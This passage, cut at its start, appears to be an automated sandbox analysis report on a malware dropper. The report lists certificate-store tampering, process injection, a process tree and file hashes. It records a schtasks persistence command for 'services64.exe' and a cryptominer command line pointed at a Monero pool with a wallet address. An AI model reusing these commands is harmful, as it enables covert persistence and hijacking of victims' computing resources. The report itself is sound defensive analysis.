25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	zaiqa_7.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	zaiqa_7.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	zaiqa_6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54362000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd155090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	services64.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2500	zaiqa_2.exe
2500	zaiqa_2.exe
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found
1340	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2500	zaiqa_2.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2016	zaiqa_8.exe
Token: SeDebugPrivilege	1172	zaiqa_6.exe
Token: SeDebugPrivilege	1768	chrome2.exe
Token: SeDebugPrivilege	1068	services64.exe
Token: SeLockMemoryPrivilege	2384	explorer.exe
Token: SeLockMemoryPrivilege	2384	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2356 wrote to memory of 2644	2356	8765c39cc6647adc171220b11942422b.exe	28
PID 2356 wrote to memory of 2644	2356	8765c39cc6647adc171220b11942422b.exe	28
PID 2356 wrote to memory of 2644	2356	8765c39cc6647adc171220b11942422b.exe	28
PID 2356 wrote to memory of 2644	2356	8765c39cc6647adc171220b11942422b.exe	28
PID 2356 wrote to memory of 2644	2356	8765c39cc6647adc171220b11942422b.exe	28
PID 2356 wrote to memory of 2644	2356	8765c39cc6647adc171220b11942422b.exe	28
PID 2356 wrote to memory of 2644	2356	8765c39cc6647adc171220b11942422b.exe	28
PID 2644 wrote to memory of 2952	2644	setup_install.exe	55
PID 2644 wrote to memory of 2952	2644	setup_install.exe	55
PID 2644 wrote to memory of 2952	2644	setup_install.exe	55
PID 2644 wrote to memory of 2952	2644	setup_install.exe	55
PID 2644 wrote to memory of 2952	2644	setup_install.exe	55
PID 2644 wrote to memory of 2952	2644	setup_install.exe	55
PID 2644 wrote to memory of 2952	2644	setup_install.exe	55
PID 2644 wrote to memory of 3020	2644	setup_install.exe	30
PID 2644 wrote to memory of 3020	2644	setup_install.exe	30
PID 2644 wrote to memory of 3020	2644	setup_install.exe	30
PID 2644 wrote to memory of 3020	2644	setup_install.exe	30
PID 2644 wrote to memory of 3020	2644	setup_install.exe	30
PID 2644 wrote to memory of 3020	2644	setup_install.exe	30
PID 2644 wrote to memory of 3020	2644	setup_install.exe	30
PID 2644 wrote to memory of 2148	2644	setup_install.exe	54
PID 2644 wrote to memory of 2148	2644	setup_install.exe	54
PID 2644 wrote to memory of 2148	2644	setup_install.exe	54
PID 2644 wrote to memory of 2148	2644	setup_install.exe	54
PID 2644 wrote to memory of 2148	2644	setup_install.exe	54
PID 2644 wrote to memory of 2148	2644	setup_install.exe	54
PID 2644 wrote to memory of 2148	2644	setup_install.exe	54
PID 2644 wrote to memory of 1484	2644	setup_install.exe	53
PID 2644 wrote to memory of 1484	2644	setup_install.exe	53
PID 2644 wrote to memory of 1484	2644	setup_install.exe	53
PID 2644 wrote to memory of 1484	2644	setup_install.exe	53
PID 2644 wrote to memory of 1484	2644	setup_install.exe	53
PID 2644 wrote to memory of 1484	2644	setup_install.exe	53
PID 2644 wrote to memory of 1484	2644	setup_install.exe	53
PID 2644 wrote to memory of 2076	2644	setup_install.exe	52
PID 2644 wrote to memory of 2076	2644	setup_install.exe	52
PID 2644 wrote to memory of 2076	2644	setup_install.exe	52
PID 2644 wrote to memory of 2076	2644	setup_install.exe	52
PID 2644 wrote to memory of 2076	2644	setup_install.exe	52
PID 2644 wrote to memory of 2076	2644	setup_install.exe	52
PID 2644 wrote to memory of 2076	2644	setup_install.exe	52
PID 2644 wrote to memory of 2964	2644	setup_install.exe	51
PID 2644 wrote to memory of 2964	2644	setup_install.exe	51
PID 2644 wrote to memory of 2964	2644	setup_install.exe	51
PID 2644 wrote to memory of 2964	2644	setup_install.exe	51
PID 2644 wrote to memory of 2964	2644	setup_install.exe	51
PID 2644 wrote to memory of 2964	2644	setup_install.exe	51
PID 2644 wrote to memory of 2964	2644	setup_install.exe	51
PID 2644 wrote to memory of 1892	2644	setup_install.exe	50
PID 2644 wrote to memory of 1892	2644	setup_install.exe	50
PID 2644 wrote to memory of 1892	2644	setup_install.exe	50
PID 2644 wrote to memory of 1892	2644	setup_install.exe	50
PID 2644 wrote to memory of 1892	2644	setup_install.exe	50
PID 2644 wrote to memory of 1892	2644	setup_install.exe	50
PID 2644 wrote to memory of 1892	2644	setup_install.exe	50
PID 2644 wrote to memory of 1976	2644	setup_install.exe	49
PID 2644 wrote to memory of 1976	2644	setup_install.exe	49
PID 2644 wrote to memory of 1976	2644	setup_install.exe	49
PID 2644 wrote to memory of 1976	2644	setup_install.exe	49
PID 2644 wrote to memory of 1976	2644	setup_install.exe	49
PID 2644 wrote to memory of 1976	2644	setup_install.exe	49
PID 2644 wrote to memory of 1976	2644	setup_install.exe	49
PID 2644 wrote to memory of 1796	2644	setup_install.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\8765c39cc6647adc171220b11942422b.exe
"C:\Users\Admin\AppData\Local\Temp\8765c39cc6647adc171220b11942422b.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2356
- C:\Users\Admin\AppData\Local\Temp\7zS4394F506\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS4394F506\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_2.exe
    3⤵
    - Loads dropped DLL
    PID:3020
  - - C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_2.exe
      zaiqa_2.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:2500
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 424
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_9.exe
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_8.exe
    3⤵
    - Loads dropped DLL
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_7.exe
    3⤵
    - Loads dropped DLL
    PID:1892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_6.exe
    3⤵
    - Loads dropped DLL
    PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_5.exe
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_4.exe
    3⤵
    - Loads dropped DLL
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_3.exe
    3⤵
    - Loads dropped DLL
    PID:2148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c zaiqa_1.exe
    3⤵
    - Loads dropped DLL
    PID:2952

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_6.exe
zaiqa_6.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_4.exe
zaiqa_4.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2828
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:3008
- C:\Users\Admin\AppData\Local\Temp\chrome2.exe
  "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:1768
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    3⤵
    PID:2364
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
      4⤵
      Creates scheduled task(s)
      PID:1644
- - C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:2164
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:1964
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:1740
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2384

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_9.exe
zaiqa_9.exe
1⤵
- Executes dropped EXE
PID:2428

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_7.exe
zaiqa_7.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:840

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_5.exe
zaiqa_5.exe
1⤵
- Executes dropped EXE
PID:948

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_3.exe
zaiqa_3.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1792

C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1706806280 0
1⤵
- Executes dropped EXE
PID:892

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_1.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_1.exe" -a
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3032

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_5.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_5.exe"
1⤵
- Executes dropped EXE
PID:2252

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_9.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_9.exe"
1⤵
- Executes dropped EXE
PID:1472

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_8.exe
zaiqa_8.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_1.exe
zaiqa_1.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
05420a9014285cd31ee876f44d93d00a

SHA1
5a01122245c8f7677c50365e125056eadca16a27

SHA256
d785821f5ab31153de9a2c30822da0bfc7163596da500b91fd604c7712b282f6

SHA512
e3fb6f392412eab2973e833159344cc1679a77747ac83de8798a3a8028555d4dae7fbe6fc61231e9d0ab361bfa2029c8a88441db49869c1eead7d6421f1207f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4394F506\libgcc_s_dw2-1.dll

Filesize
113KB

MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_2.exe

Filesize
188KB

MD5
44dc205a5701b53f391a3a750c2c4712

SHA1
14e82b1f6bb987d8f2783db2ab5f82dd9ab8eacc

SHA256
508c41442ba856a3266b3e58a31fe8c4b0ad7491e04dfead265daaa028efd768

SHA512
02890434c81867499e0911e8062797bf7fc184e05b6de2ab14ffa6f95c48f88e07250b4e5a7ff565bbf45d66d8d7cb5c1009b85085ee3a6bbdac218f356c5749

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_3.exe

Filesize
193KB

MD5
93c178a72c32d108eb4a0458002ed3c5

SHA1
ee704cf5296be195ff749ea9426fdbec50ad0aaa

SHA256
14b17d64acfd55061a59ebc4a7a7bc1bda964a78a27f0a0cdb05c42aee2ca945

SHA512
8ce60100f9e3c0a99a3cf62c8fff374957281fedef774b99eeea8bf6d33cffa31c8826c7836618489d0311f904fb13fd261f6a381dcafe4a01b19cee421ec3dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_3.txt

Filesize
555KB

MD5
8595f5515fac09b73ff463056cb07a15

SHA1
80f39da9a52cffb70edaa4d7de82f543ba4d417e

SHA256
8223619e305ec5063e9e2c1490fa25f6e924c317b08fd5eed938bb5de2e57de1

SHA512
26f0a15484a8780fedcea91f9d90ab4b81a91598fad4cad54f45fd18eccf73914215851909bf8acadeafc7b89c656c98ec988a46aa43e17a364b39b5d8ac477a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_4.exe

Filesize
923KB

MD5
13a289feeb15827860a55bbc5e5d498f

SHA1
e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad

SHA256
c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775

SHA512
00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS4394F506\zaiqa_5.exe

Filesize
111KB

MD5
2bf6324dbf0cc56556eef42207f6dd41

SHA1
06752a06b032f8463a8ceacbd923c34c28859148

SHA256
98bc955ca251b3765a651e100bf2c58345bf105b179b47452996d2fc400c7c94

SHA512
